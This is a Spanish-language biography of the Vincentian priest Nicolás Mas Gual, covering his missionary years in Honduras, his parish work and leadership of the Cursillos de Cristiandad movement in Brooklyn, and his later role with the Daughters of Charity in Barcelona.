EL P. JOAN SONET MIRÓ, C.M. NOS HABLA SOBRE EL P. MÁS

NICOLÁS MÁS GUAL‏
NICOLÁS MÁS GUAL‏

P. NICOLÁS MÁS GUAL, C.M. (1920 – 2011)

Descarga biografia en PDF

(Biografía escrita por el P. Joan Sonet Miró, cm.)

Si hubiera esperado a escribir una BIOGRAFÍA, lo más completa posible del benemérito P, Nicolás Mas, después de su fallecimiento que ha ocurrido el 19 de julio, 2011, cumplidos sus 91 de edad, me hubiera supuesto iniciar un muy minucioso trabajo de investigación en las diversas publicaciones tanto de nuestra propia Provincia de Barcelona, como los Anales, C M., acerca de la vida y actividades de un Misionero de primera talla.
Por eso me propuse empezar este largo recorrido de la vida de uno de los más laudables miembros que ha tenido la Provincia de Barcelona, cuando en diciembre del año 2008 se agravó una larga enfermedad que le acompañó durante mucho años, producida por las repetidas infecciones en un rodilla.
Mi decisión fue secundada enseguida por el Visitador P. José Vicente Martínez, quien me animó a hacer una “Biografía exhaustiva” de este Misionero ejemplar, inagotable, afable, bondadoso, desbordante de simpatía, con quien tuve la suerte de convivir tanto en mis primeros 10 años de ministerio en Brooklyn, como 25 años más tarde en la Casa Provincial.

En todos lugares donde le tocó desarrollar su ministerio siempre dejó la huella de su gran celo misionero, empezando por sus dos años en la Misión de Honduras, más tarde otro par de años como Director de la Apostólica de Palma de Mallorca, y donde pudo dar su mejor celo apostólico durante sus quince en Brooklyn, destino que se vio imprevisiblemente truncado cuando tuvo que dejar muy a pesar suyo, de los fieles y de la misma Curia Diocesana, al reclamado para ayudar al P. Miguel Piquer en la atención al gran número de las Hijas de la Caridad de la Provincia de Barcelona, y posteriormente su elección como Visitador de la Provincia de Barcelona. Estas actividades y otras de menos importancia las iré desarrollando progresivamente en los siguientes apartados.

I.- PRIMEROS AÑOS DE VIDA – ENTRADA EN LA C.M.

El día 14 de junio de 1920 nacía en el pueblo de María de la Salud, el último de los hijos del cristiano matrimonio de Pedro Mas y Juana-Ana Gual. Dos días más tarde recibiría las aguas regeneradoras del bautismo. De su confirmación solamente se nos ha dejado constancia en el Archivo es que tuvo lugar en su mismo pueblo natal, se supone que junto a otros candidatos, de manos del estimado, también por la Congregación, Dr. Don José Miralles, Obispo de Mallorca.

Su decisión de aceptar la llamada a entrar en la Congregación de la Misión sería sin duda debida a insinuación de su tío el P. Bartolomé Gual, C.M., poniéndole en conocimiento de la labor de tantos Misioneros que desde la Fundación de la Casa de Palma de Mallorca el año 1760, se dedicaron a la predicación de misiones populares en la mayor parte de las Islas Baleares y en su mismo pueblo natal, y otra obra vicenciana como eran los Retiros espirituales a sacerdotes y seglares.
Animado por este espíritu misionero, a sus trece años decidió entrar en la Escuela Apostólica, en Son Anglada. Terminados sus primeros estudios preparatorios, el 7 de septiembre de 1937 fue admitido en el Seminario Interno, sin moverse de Mallorca, cuando ya hacía un año había comenzado el Movimiento Nacional.
Pronunció sus votos perpetuos el 9 de agosto de 1940. Al igual que otros Hnos. Estudiantes, durante algún tiempo se vio obligado a ir combinando el vestir la sotana vicenciana con el uniforme militar. Copiamos textualmente del Suplemento de la revista GERMANOR, enero-abril 1938: “El 6º día de los Ejercicios Espirituales en Son Anglada, (donde se habían traslado los Hnos. Filósofos) el 13 de septiembre el Hno. Mas tiene que dejar Son Anglada para seguir el servicio militar en el Cuerpo de Infantería en la población de Inca. Allí encuentra las bondades de caridad hospitalaria de los PP. Franciscanos, que le dan buena acogida”.

Creo oportuno hacer mención de que el mismo año 1936 tuvo que dejarse de editarse la amena, interesante, comunicativa publicación provincial GERMANOR, que había empezado a publicarse a finales del año 1918 por los Hnos Estudiantes en Espluga de Francolí. Afortunadamente la publicación de la revista se reanudó gracias al interés del inteligente recién ordenado P. Nicolás Pascual, aunque viéndose obligado a hacer dos variaciones: cambiar el nombre de la revista, editada mayormente en catalán desde sus comienzos, por el de ANALES DE LA PROVINCIA DE BARCELONA El ingenioso nuevo Director se cuidó de ir editando las noticias que le iban llegando tanto por parte de los misioneros cooperadores del Perú, Honduras y Brooklyn, como también de los que se encontraban en diferentes campos de batalla o en exilio.
Usando el vocablo introducido por el mismo P. Pascual, voy a seguir “espigando” las noticias más importantes acerca de la vida y milagros de nuestro querido biografiado, gracias, precisamente, a la nueva publicación provincial.
.
Terminado el Alzamiento o “Cruzada” Nacional, todo el personal docente que se encontraba en Palma de Mallorca, los HH. Estudiantes y Seminaristas, con sus Directores respectivos, tuvieron que trasladarse a la Casa de Formación de l’Espluga de Francoli, el día 16 de agosto de 1939.
Lo sorprendente es que habían empezado a sentirse rumores de que aquella Casa de Formación se iba a clausurar temporalmente. Efectivamente en Anales se publicó que eso se realizaría a la mitad del curso1940-41, aunque tuvo que demorarse más de los pensado, debido a una pasa general de gripe que deslució la fiesta del 25 de Enero, tuvo que retrasarse una semana el viaje de la totalidad de Comunidad para trasladarse al Convento de Bellpuig.
Me permito copiar textualmente este curioso párrafo de los Anales: “Por fin, el día 3 de febrero, en un camión… llegaban los huéspedes al viejo cenobio levantado por los Duques de Cardona. La chiquillería que en esos momentos salía a recreo saludo con u alegría bulliciosa la entrada de los nuevos moradores… Los HH. Estudiantes se acomodaron en los flamantes aposentos del lado Sur del segundo piso que se habían construido con miras a las Tandas de Ejercicios Espirituales y los Seminaristas en el lado opuesto”.
Al final del Curso 1940-41 el Hno. Mas debe viajar a Cuenca donde como venía haciéndose desde algunos años, los Hnos. Teólogos cursaban los 4 años de Teología. No ha sido posible encontrar ningún detalle de la larga estancia de nuestro biografiado en la Casa del Teologado de la Provincia de Madrid.
La única noticia aparecería gracias a una crónica del Hno. Oscar Fernández, relativa a la su ordenación sacerdotal, junto con sus compañeros César Portal Portal y Óscar Fernández, miembros de la Provincia, formados anteriormente en su nativo Perú, hasta sus estudios de Teología en Cuenca. No constan las fechas de sus otras órdenes, sólo su ordenación sacerdotal que tuvo lugar el día 3 de junio de 1945. La ceremonia se celebró solemnemente en la la capilla del Seminario de San Pablo.. con la asistencia y solemnización por parte del resto de los teólogos del mismo, entre los cuales se encontraban cinco teólogos más de nuestra Provincia. El celebrante fue el obispo de la ciudad, Mons. Inocencio Rodriguez.
Al día siguiente, en velada familiar, llena de hermosos sentimientos, los hermanos estudiantes despidieron a sus antiguos compañeros.
Mientras el P. Fernández quedaba destinado a la Comunidad de Espluga de Francolí, los PP. Portal y Mas se quedaron un tiempo en Barcelona mientras preparaban sus pasaportes, para el Perú y Honduras donde fueron destinados respectivamente.

El mes de agosto el P. Mas tomaba el trasatlántico “Marqués de Comillas rumbo a La Habana, donde fue muy bien acogido en la Parroquia de Ntra. Sra. de la Merced regentada por los Padres Paúles, como tenían la buena costumbre de hacerlo con los misioneros destinados a alguna de las “tres” Américas. El 13 de octubre pudo partir en avión hacia Tegucigalpa donde le esperaban el Superior, P. Mariano Pérez y algún otro acompañante. Una vez arreglados los papeles de entrada, el día 15 del mismo mes emprendió de nuevo viaje a San Pedro Sula y donde quedó destinado.

II.- “YA HE INICIADO MI VIDA MISIONERA”

Con este enunciado el nuevo misionero iniciaba su primera crónica a la Provincia. Una anotación del Director de Anales de Provincia de Barcelona, P. Nicolás Pascual, en letra pequeña y cursiva dejó constancia que dicha crónica llegó a sus manos por conducto de una hermana del P. Mas, Sor Antonia, Hija de la Caridad, recién llegada también del Vicariato Apostólico de San Pedro Sula.
Solamente anotaré unos breves datos estadísticos y las impresiones del P. Más. “Llegué a Tegucigalpa, por vía aérea, desde Cuba, el día 15 de octubre… Desde ese día me siento muy feliz, me siento misionero. No cambio mi situación por ninguna otra, porque ser misionero fue la aspiración de mi vida entera”.
Estas palabras indican claramente los sentimientos más íntimos de este preclaro misionero. Aunque vendrían posteriores destinos, nunca le faltarían al P. Mas, el espíritu misionero reflejado en el entusiasmo que dedicó a todos los trabajos que le serían encomendados en el resto de su larga vida.
Su primer y único destino en Honduras fue en la Parroquia de San Pedro Sula, desarrollando su actividad en el cuidado y visita de pueblos y aldeas. En el año 1946 encontramos en Anales una larga y minucioso crónica de sus primeras correrías apostólicas actividades apostólicas en el que narra su participación en la visita bajo el título: “Excursiones misionales en mi primer año de Misionero”. Duraron unos 4 meses, siendo entre todas unas 18, 14 de ellas con sus iglesias, “diseminadas en una extensión mayor que la Isla de Mallorca”. Su amena relación va contando las principales características de cada una de ellas, salpicada de curiosas anécdotas. En la mayor parte de ellas detalla la población, sacramentos administrados, en una de ellas participó Mons. Juan Sastre, predicando y administrando confirmaciones, 215 en Choloma, con 3.000 habitantes en aquel entonces, una de las más grandes, y que en un futuro próximo tendría su propio párroco, enero 1958, en la persona del malogrado P. Francisco Mas Matas. Estas correrías tuvo que hacerlas subiendo grandes alturas unas veces, bajando otras veces al caluroso valle de Sula, viajando de todos modos: a pie, en camiones, montado, en cayucos, cabalgando, con sudores y calores, polvo, sed…
Bajo su cargo quedó también la procura doméstica de la casa y el cuidado de la imprenta diocesana como también la tienda de objetos religiosos…
Poco tiempo estuvo en la Misión pero bien aprovechado en su labor misionera.
Como anécdota voy a insertar parte de una entrevista que le hizo un periodista el año 1999, en Palma de Mallorca, acerca de su vida apostólica en Honduras. Afortunadamente llegó a mis manos el reportaje de las páginas centrales del periódico y que he ido conservando hasta el día de hoy para publicar, por lo menos el párrafo más largo e interesante que les ofrezco: “La cuestión del aseo e higiene eran otro aspecto problemático para el misionero, días y días con la misma ropa, lo cual fue motivo de una tragedia. En un poblado, junto a un río, una mujer nativa se ofreció a lavarme la ropa…pero cuando me estaba atendiendo, al borde casi del agua, asomó un cocodrilo y dándole un coletazo a la mujer la tiró al río y fue destrozada por el animal… Fuimos a la caza del cocodrilo con una barca y con un foco divisamos los ojos del animal. Los indios le lanzaron unos rampins, (instrumento con garfios) y lo agarramos Pero. así y todo el cocodrilo le pegó un bocado a la barca que casi nos tiró al agua. Yo quería ir a la orilla nadando, pero los indios me lo impidieron asegurando que más allá había otros cocodrilos…. Contrariamente a lo que pueda imaginarse, los mayores enemigos del misionero eran las garrapatas, los mosquitos y las chinchas…”. (Publicado el la revista “dominical” del domingo, 10 de enero, 1999, por Manuel Santolaria).

III.- PRIMER DESTINO A PALMA DE MALLORCA

Obediente a la voluntad de los Superiores, cuando menos se lo pensaba aceptó empezar un ministerio muy diferente. El Visitador aprovechó una venida del P. Mas para participar en una peregrinación a la ciudad eterna para designarle como relevo del enfermizo P. Molluna en el cargo de Director de la Escuela Apostólica de Palma de Mallorca.
El P. Mas había llegado a Barcelona procedente de Nueva York el 6 de marzo de 1950 y al poco tiempo viajó por mar hacia su nuevo destino. Se encontró con un grupo de casi 40 de apostólicos, niños y jóvenes. Su carácter afable, comunicativo, sonriente, le ayudó a ser aceptado con mucho agrado. Durante su estancia se hicieron importantes reformas en la más que bicentenaria Casa de “La Missió” como era conocida por toda la Isla.
Este destino duró solamente dos años ya que la Divina Providencia le tenía destinado ejercer su ministerio evangelizador en otra parcela muy diferente a las dos anteriores. Sin duda que su labor como Director de la Escuela Apostólica daría mucho fruto. El mismo día que viajaba a Barcelona le acompañaban varios candidatos a entrar en el Seminario Interno de l’Espluga de Francolí.
No me resisto a dejar de mencionar que el P. Mas había dejado para la posteridad un interesante trabajo histórico con motivo de 150 aniversario de la Escuela Apostólica de Palma de Mallorca: se trata de una cuidadosa lista anual de todos los apostólicos que entraron en la Escuela Apostólica, de sus inicios el año 1891, gracias a la iniciativa del benemérito P. Buenaventura Bayó, C.M.

IV.- LARGO Y FRUCTÍFERO DESTINO A BROOKLYN, N. Y.

Los misioneros destinados a las diversas Fundaciones: Capilla de la Virgen Milagrosa en Philadelpia (1912), Capilla-Parroquia de Ntra. Sra del Pilar (12.10.1914) y posteriormente el encargo diocesano de hacernos cargo de la Parroquia de San Pedro (1935), habían ido cambiando aunque muy moderadamente. Me limito al destino del biografiado: El año 1950 fue el P. Nicolás Mas quien fue llamado para formar parte de la comunidad de Brooklyn. Allí le tocó, como a otros predecesores suyos, el aprendizaje de la lengua de W. Chakespeare que usaban los parroquianos emigrantes, sobretodo irlandeses e italianos de la parroquia de St. Peter’s, en cuyo favor se celebraban la mayor parte de las misas y se atendían otros servicios, asociaciones, etc. Los feligreses de habla hispana, con el apoyo del Sr. Párroco empezaron a ser atendidos en su lengua propia a principios del año 1931, permitiéndoles usar tan solo el “basemant”, hasta que finalmente el año 1935 el Sr. Obispo decidió que la Parroquia pasara a ser atendida únicamente por nuestros Padres, continuando con su ministerio en la Capilla del Pilar. Por eso desde entonces la Parroquia empezó a tomar el nombre de St. Peter’s-O.L.of Pilar Church. Solamente se celebraba una Eucaristía diaria en castellano…
Al P. Mas le aguardaba una Misión especial: desde principios de 1950 el obispo titular Mons Thomas W. Molloy, que guardaba una larga amistad con el P. Pablo Ramis, se dio cuenta de que el número de emigrantes hispanos de procedencia mayormente portorriqueña estaban invadiendo otra zona de su vasta diócesis, en la extensa barrriada de Bedford-Styvessnt. Sus visitas al lugar donde quería erigirse una Capilla Hispana, acompañado siempre del párroco de San Pedro eran frecuentes y a partir de 1952 también el P. Mas con la ayuda de la infatigable Sor Angelita, catequista durante muchos años en la Capilla del Pilar, fueron preparando mental y espiritualmente a los hispanos que ocuparían la nueva Capilla Hispana que se estaba levantando en el 234 de Vernon Ave. La pesadilla de desalojar a los moradores de los tres pisos del inmueble retrasó la inauguración más de lo esperado.
No sería hasta que el 16 de mayo de 1954 que se abriría solemnemente la nueva Capilla bajo el bilingüe título: “Montserrate Mission Chapel” y “Ntra. Sra. de Monserrate”, para satisfacer el deseo de los portorriqueños que también tenían su Santuario dedicado a la Virgen Montserratina, y también, sin duda, al deseo de los antiguos emigrantes catalanes en la isla caribeña.
Grandísima fue la satisfacción del obispo de la Diócesis de poder bendecir el nuevo templo católico, como también lo sería para los PP. Ramis, Mas y Anglés, sin contar la de los muchísimos asistentes entre los que se encontraban ocupando los primeros bancos feligreses venidos de la Parroquia Madre, sin que faltaran las famosas Ladies Spanish Mission Auxiliary que habían participado durante muchos años en las actividades catequéticas y sociales de los niños en la Capilla del Pilar y que continuarían ayudando al P. Mas antes y después de la inauguración.
Naturalmente quedó como encargado de la Capilla el P. Nicolás Mas, ayudado por su compañero de estudios el P. Sebastián Anglés. La labor organizativa de los comienzos y del seguimiento fueron arduos, pero muy gustosamente aceptados por el tenaz e incansable biografiado. La tarea primaria fue la catequesis tanto infantil como de adultos, ya que habían muchas parejas que no habían tenido la oportunidad de haber podido casarse por la iglesia en su lengua natal. Poco a poco se fueron formando las Asociaciones tradicionales en América, Sociedad del Santo Nombre, Damas del Sagrado Corazón, Hijas de María, Sr. y Jr., Conferencias de San Vicente de Paúl, sin que faltaron los grupos monaguillos, ni menos aún las tradicionales Tropas de Boy y Girl Scouts en sus varios niveles.
El P. Mas pronto necesitó más refuerzos, siendo el primero el dinámico joven, P. Eleuterio Sebastián; luego legó el P. José Prat procedente del Seminario de Tegucigalpa quien solamente estuvo dos años, siendo relevado a finales de 1947 por el “pichoncito” de la Comunidad el P. Joan Sonet, procedente de la Escuela Apostólica de Bellpuig.
La ayuda que no podía faltar era la de conseguir una Comunidad de Hermanas que se encargaran eficientemente de la catequesis. Lo consiguió el P. Mas gracias al interés de las llamadas Sisters of Notre Dame, fundadas en Philadelphia y que se dedicaban mayormente a la enseñanza en las escuelas parroquiales, quienes junto la ayuda de algunos catequistas adultos pudieron atender el numeroso grupo de niños y niñas y jóvenes que se preparaban para la primera comunión y la confirmación.
La asistencia a los actos religiosos iba en aumento. Pronto el Encargado de la Capilla se dio cuenta de que la Capilla en la que sólo cabían 200 personas sentadas resultaba del todo insuficiente. Había paralelamente a la misma un salón que también se llenaba de fieles, como también los pasillos laterales, entrada… Ya se había tenido en cuenta la compra del edificio de al lado, pero la gran dificultad fue convencer a los inquilinos del inmueble a mudarse. Cuando al fin se consiguió pudo ampliarse especialmente la atención a los diferentes grupos de catequesis, con un amplio despacho parroquial, otro más adentro para la Sister encargada de la catequesis, como también conseguir para las Hermanas su propio piso. Las reuniones para las diferentes Asociaciones se tenían en el basemant o salon debajo de la capilla, usado también como sala de fiestas organizadas por la Capilla, rifas, tómbolas, bailes con su pequeño cocina, y que daba a un patio exterior, poco usado. También se amplió notable y necesariamente parte del nuevo edificio para una cocina y comedor más amplios, así como la sala de estar y las habitaciones de los misioneros y transeúntes.
Si damos una vista a los datos estadísticos del año 1960, comprobamos que se habían realizado 1.518 bautismos; 409 primeras comuniones; 129 confirmaciones; 333 matrimonios. Los Miembros del Santo Nombre llegaron a 211 los hombres y a 58 los juniors; a la Asociación de las Damas del Sgdo. Corazón llegaron a inscribirse 316socias y unas 159 Hijas de María Jr. y 140 las Sr. Los monaguillos llegaron a ser 18…; no consta el número de Caballeros de Colón que también iban aumentado en más moderado número. Habría que dar crédito a todo el “staff”, pero si no hubiera sido por el entusiasmo, capacidad, iniciativas, el carácter alegre, comunicativo, acogedor que animaba a quien estaba enfrente de todo ello, quizá no se hubiera logrado un número tan impensable de hispanos para quienes “La Monserrate” sería su iglesia preferida.

Movimiento de los Cursillos de Cristiandad.

Aunque este apartado está escrito en letras minúsculas, llegaría a ser MAYÚSCULA la labor evangelizadora iniciada en Brooklyn, gracias al denodado empeño del P. Mas para la Renovación de la vida cristiana de miles y miles de católicos tanto ya practicantes hasta llegar a los más alejados de la Iglesia.
Su antigua amistad con el fundador de los Cursillos de Cristiandad, el inspirado Sr. Eduardo Bonnin el año 1943 junto con un grupo de colaboradores, le ayudó a obtener toda la serie de normas prácticas para el buen desarrollo de Movimiento y el material de “rollos”, etc.
Sería el histórico día 27 de septiembre de 1961 cuando el P. Mas había animado ya a un grupo de 17 candidatos de la Capilla de La Montserrate a participar en un primer Cursillo de hombres en el amplio St. Joseph’s Center que los Padres Agustinos dirigían en la diócesis de Nueva York.
Unos meses más tarde, el día 8 de enero de 1962, el P. Mas ya predicaba las Conferencias reservadas para los sacerdotes, en el mismo Centro de Nueva York, al que asistió un más numeroso grupo de candidatos de Brooklyn. Y pronto sería del 6 al 9 de diciembre cuando los PP. Mas y Raymundo Revoredo, con un grupo de Dirigentes dirigieron un Cursillo en el Monasterio de Tagaste, en Sufern, N. Y. con la participación de candidatos de 16 parroquias brooklynenses. Sería considerado como el Cursillo Nº 1º de la diócesis de Brooklyn, con todos los dirigentes, colaboradores y cursillistas propios.
Eran los inicios oficiales del Movimiento de Cursillos de Cristiandad puesto bajo la dirección ya experimentada del P. Nicolás Mas, al mismo tiempo que nacía la revista “Ultreya de Brooklyn”, en la que se daban noticias locales e internacionales, artículos de formación, nombre y parroquia de los candidatos participantes en cada Cursillo.
El primer Cursillo para señoras no se celebraría hasta mayo de 1963 con 40 participantes. En el Cursillo Nº 4 de hombres empezó a colaborar el P. José Mª Biosca. El mismo año en que el P. Real, párroco de la Capilla de la Milagrosa de Filadelfia reclamaba que con el apoyo de Dirigentes de Brooklyn se estableciera allí el Movimiento de Cursillos de Cristiandad, dando muy buen resultado, por su continuación durante muchos años.

También había llegado al conocimiento del obispo de San Pedro Sula, Mons. José Villas, C.M., los frutos renovadores del Movimiento Cursillista. El P. Mas empezó a reclutar a un pequeño grupo de Cursillistas de La Montserrate que se dispusieron a dejar sus obligaciones para acudir generosamente a la llamada del Prelado de nuestra Misión de Honduras. Efectivamente del 7 al 10 de enero de1965 se dio el primer Cursillo para hombres en San Pedro Sula, y el fin de semana siguiente en La Ceiba. Pero las aspiraciones eran llegar a darlos también a las difíciles tierras de la Moskitia. A este fin el P. Mas había solicitado al muy afable y políglota organista de la Capilla de la Montserrate, Mr. Albán Velázquez, que hacía años estaba trabajando como traductor en varias lenguas del prestigioso New York Times, para que preparara algunos rollos en su lengua nativa: el garífuna. Así fue como el Movimiento Cursillista llegó a 40 Morenos de la Misión de Honduras. En la semana siguiente se dio otro Cursillo para mujeres en San Pedro Sula con ya la ayuda de algunos rollistas y colaboradores hondureños. Esta vez la Clausura fue, naturalmente bastante más numerosa. Tanto el Sr. Obispo como el mismo P. Mas se sintieron muy satisfechos por el nuevo apostolado incorporado en la Costa Norte de Honduras y agradecidos hacia los generosos dirigentes y colaboradores brooklynenses que participaron en la gira apostólica.

Gracias al empeño del P. Mas, un año antes, el día 8 de marzo de 1964 quedaría recordado como el de la solemne y muy concurrida Inauguración de la Casa de Cursillos en la calle Congress, cerca de nuestra espaciosa parroquia de San Pedro, donde desde buen principio se hacían las Clausuras, cada vez más multitudinarias. Quizá el más satisfecho sería el mismo Sr. Obispo de Brooklyn, Mons. Mc Entegart quien bendijo el local y los 50 crucifijos para las habitaciones y dependencias del Centro. También tuvo el Obispo unas palabras de agradecimiento para todos los Padres que desde hacía años trabajaban en su Diócesis, empezando por la Capilla del Pilar, en la Parroquia de San Pedro, Capilla de La Montserrate. La asistencia fue de 30 sacerdotes y unos 600 cursillistas de diferentes parroquias de la extensa diócesis.
Hay que hacer constar que la nueva Casa de Cursillos quedó bajo la Dirección de los padres Raymundo Revoredo y José Mª Biosca, quedando este último como Administrador de la Casa.
Al entusiasmo apostólico que distinguió siempre al P. Mas, se añadieron los Retiros, Semanas Cuaresmales, y también algunas Misiones no sólo en Brooklyn sino también en dos ciudades del Estado de New Jersey, con grandes elogios por parte de los sacerdotes que han quedado publicados en los ANALES DE LA PROVINCIA DE BARCELONA.

Así iba siguiendo la popularidad del P. Mas, cuando, de repente, le llegó un delicado destino en Barcelona, en julio de 1965.
El conocimiento de la inesperada marcha de P. Mas, que corrió como pólvora por todo Brooklyn, causó grandísimo disgusto general y en particular para la Escuela de Dirigentes de la cual había seguido siendo responsable, junto con dirigentes, colaboradores, vocales…, y de miles de cursillistas o no, fue enorme. La pérdida del P. Mas dolió también mucho a de la Curia diocesana. Cuando el P. Mas había empezado ya su nuevo ministerio vicenciano como Subdirector de las Hijas de la Caridad de la Provincia de Barcelona, ANALES publicó la medida carta del obispo de Brooklyn, Mons. Bryan McEntegart dirigida al Provincial, aceptando el “inapelable” destino del apreciado P. Mas a Barcelona, sin dejar de observar la valiosa privación que suponía para su Diócesis.
En el próximo apartado explicaremos el motivo del nuevo destino.

Pero antes, quien redacta estas páginas quisiera hacerse testigo de unos pocos datos estadísticos que demuestran el resultado tan beneficioso que el Movimiento de los Cursillos de Cristiandad representó para la vasta diócesis de Brooklyn-Queens, con más de dos millones de habitantes. Cuando el año 1962 empezó el primer Cursillo, en Brooklyn eran todavía pocas las parroquias donde se tenía algún servicio religioso para los hispanos portorriqueños, dominicanos y de América del Sur en su propio idioma. Pero unos 25 años más tarde, ya habían ascendido a un centenar las parroquias donde al menos se celebraba la Misa en castellano al menos una vez a la semana; en 85 de las iglesias existían grupos activos de Cursillistas

¿Exagero si afirmo que todo ello fue debido, en gran parte, a la incasable labor apostólica de uno de los más destacados, entusiastas, emprendedores miembros de la Provincia de Barcelona, en la persona del afable, atento, entusiasta, tenaz, benemérito biografiado?

Sin olvidar la labor de los misioneros que quedaron encargados del Centro de Cursillos, de los padres cooperadores, y en los últimos años algunos Teólogos de nuestra Provincia. La gran aventura duró 42 años llevada a cabo, abnegadamente, por los miembros de la Provincia de Barcelona, hasta que, muy lamentablemente, a mediados del año 2004 se cerró, se cree que por falta de personal, la Casa de Cursillos que en los últimos años el Obispo decidió que fuera conocido en toda la Diócesis y allende como el CENTRO DE EVANGELIZACIÓN SAN VICENTE DE PAÚL.

Una vez destinado a Barcelona,, el siempre recordado P. Nicolás Mas fue invitado varias veces a participar en las efemérides más destacadas del Movimiento Cursillista en Brooklyn; múltiples aniversarios de Cursillos de hombres y mujeres, Ultreyas Diocesanas, Dirección de algún Cursillo, etc. siendo recibido invariablemente con gran regocijo por tantísimas personas que le apreciaban por su carácter tan bondadoso, comunicativo, amable…,
Para terminar este apartado hacer constar que cuando el P. Mas dejó, voluntariamente, dos años antes de terminar sus posibles 9 años de Visitadorado, el año 1986 pidió volver a prestar su ayuda en su añorado Centro de Cursillos de Cristiandad, donde se sentía más a gusto y por fin menos agobiado de responsabilidades.

V.- DIRECTOR DE LAS HIJAS DE LA CARIDAD

Había dejado escrito en párrafos anteriores que daría razón del nuevo y inesperado destino del P. Nicolás Mas a Barcelona. A finales del año 1964 tuvo lugar es España la división de las Hijas de la Caridad en nueve Provincias. Fue elegida, en primer lugar, como Visitadora Sor Elena Infante al frente de las 92 Casas que comprendía recién creada Provincia de Barcelona de las Hijas de la Caridad. Poco más tarde, el 12 de diciembre, el P. Miguel Piquer era elegido como Director de la nueva Provincia de las Hijas de la Caridad de Barcelona, con gran satisfacción de las muchas Hermanas que ya le conocían por sus amenas pláticas y por su trato amable y acogedor. Medio año más tarde, exactamente el día 25 de mayo de 1965, recibe el nombramiento de Visitador de la Provincia de Barcelona. Estar al frente de las dos Instituciones vicencianas resultaba una carga y responsabilidad demasiado extensa para un solo Misionero. Por eso se aprestó a pedir la ayuda de un Padre de prestigio que pudiera hacerse cargo de las Hermanas, como Subdirector de las Hermanas. El Superior General no dudó en hallar en el P. Nicolás Mas como el más idóneo.
Así fue como al celoso y experimentado Misionero tuvo que volver a Barcelona para ejercer, con plenas facultades, dicho delicado ministerio. Muy pronto se ganó las simpatías de las Hermanas y con motivo de la Fiesta de la Visitación del año 1966, una gran efemérides para las Visitadoras de las Hijas de la Caridad, “después de la segunda Misa que se celebraba en aquel día a las 10, presidida por el P. Mas, éste fue presentado por el P. Director a las Hermanas presentes, llegadas de un gran número de Comunidades para participar en la celebración…. El P. Miguel Piquer hizo “un bosquejo de su personalidad moral y espiritual con tanto afecto como certera”. Y sigo, aún, transcribiendo la cita de los Anales C.M. las palabras del humilde y sincero P. Mas: “No quiero alabanzas, dénselas solamente a Dios … no quiero ser juez para ustedes, sino Padre. Quiero para ustedes y para mi la vivencia de una espiritualidad vicenciana que al manifestarse en nuestras acciones y palabras atraiga hacia la Compañía numerosas almas selectas que quieran consagrarse al Dios de la Caridad… “. Después, sigue la Hna. cronista del acto , “se ofreció en todo y por todo para nuestra santificación y vida espiritual…. Todas las Hermanas se lo agradecimos del fondo de nuestra alma. Otra de la Casa Provincial se levantó para afirmar… Nosotras queremos, Rble. Padre, ser más vuestra corona, vuestro consuelo y vuestra gloria que vuestra cruz. Estamos seguras de conseguirlo con nuestra adhesión y fidelidad a vuestras sabias y santas directivas”.
Así, con buen pie empezaba el P. Mas sus funciones como Subdirector. Entre el Director y su valioso ayudante se repartían las numerosas tandas de Ejercicios Espirituales que se daban tanto en los Hogares Mundet, los más numerosos, como en Palau Tordera para las Hermanas Sirvientas. Transcribo una frase entre otras muchas: “Las Conferencias del Rble. P. Nicolás, nuestro Subdirector nos han dado mucho gusto a sus oyentes”. En otros lugares he podido leer lo mucho que gustaban a las Hermanas sus charlas y sus pláticas…
En la fiesta de Cristo Rey participó, todavía como Subdirector, a la solemne bendición, en lengua vernácula, del primer Aspirantado presidida por el Visitador, P. Miguel Piquer, con la asistencia de la Visitadora, su Consejo, las Hermanas Sirvientas de todas las Casas, con una veladita en familia a continuación.

El mismo año 1966 encontramos una noticia muy importante acerca de la intención de mandar algunas Hijas de la Caridad de Caridad a la Misión de Honduras, especialmente a la Moskitia. La oportunidad la brindó la consagración de Mons. Jaime Brufau como nuevo obispo de la vasta diócesis de San Pedro Sula, cuya consagración episcopal tendría lugar en la Solemnidad de los Apóstoles San y San Pablo.
Hechos todos los preparativos necesarios, los viajantes: la Rble. Sor Visitadora, su secretaria, Sor Saladrigues, que nos dejaría una muy detallada crónica de los lugares visitados, del P. Nicolás y los dos hermanos del nuevo obispo, el día 19 de junio partían vía aérea con una obligada escala en Brooklyn: El P. Mas y los dos hermanos del nuevo prelado se hospedaron en las dependencias de la Capilla de La Montserrate, mientras las Hijas de la Caridad se albergarían muy amablemente en el piso de las Hnas. De la Santísima Trinidad que se ocupaban de la catequesis y atención a las personas mayores.
Realizadas las imprescindibles visitas turísticas a la ciudad de los Rascacielos no exageradamente por aquellas calendas. Dos días más tarde tomaron el avión hacia San Pedro Sula. En el aeropuerto de Tacontín les esperaba el P. José Barceló, Vicevisitador, y algunos misioneros más. Allí las Hnas. se establecieron su “cuartel general” en la capital sanpedrana, trasladándose desde allí a los diversos puntos que les interesaría las seis primeras escogidas como Misioneras. Corozal, que fue el primer morenal donde les acompaño el P. Barceló y algunas padres más. Al día siguiente visitaron Sangrelaya, ya en plena Moskitia, y, por lo tanto, lejos de la civilización. Muchos de los Morenos ya habían hecho los cursillos de cristiandad.
El día 29 se quedaron en San Pedro Sula para participar en la concurridísima consagración episcopal de Mons. Jaime Brufau, presidida por los dos oficiantes, el Excmo. Mons. Santos, arzobispo de Tegucigalpa, y Mons. Álvarez, C.M., concelebrando también la mayoría de nuestros Misioneros. Estuvieron presentes el Presidente de la República, el General Oswaldo López y gran parte del gobierno.
Al día siguiente continuaron las visitas a algunas otras localidades de la Misión.
Antes de regresar a España Sor Visitadora y su inseparable Secretaria, el P. Mas les acompañó en la visita que hicieron a las Casas Provinciales de las Hijas de la Caridad de Guatemala y Méjico donde generosamente agasajadas.

El día 2 de julio cuando ya se encontraban de nuevo en Barcelona, no pudo omitirse la acostumbrada celebración del Día de la Visitadora. Celebradas las dos Eucaristías rituales, en la velada, las Hermanas Sirvientes y las demás que pudieron asistir, escucharon con gran interés las impresiones de Sor. Elena Infante y sus dos acompañantes acerca de la Misión de Honduras.
El 17de septiembre tuvo lugar la esperada Inauguración del Postulando, a la que se había invitado de una manera especial a la Asistenta de la Compañía la Rble. Sor Rohou. En la homilía de la misa solemnizada con el Magnificat del P. Alcacer, el Director “nos instó para que trabajemos con la oración y el sacrificio para alcanzar del Señor las vocaciones que necesitamos y también para quedemos gracias al Todopoderoso por las que nos envía”.
La visita también sirvió para que Sor Visitadora y el P. Mas acompañaran a Sor Rohou al pie del Tibidabo para ver los terrenos donde pronto se construiría la futura Casa Provincial, mereciendo los elogios de lo sano y bonito que era el lugar.
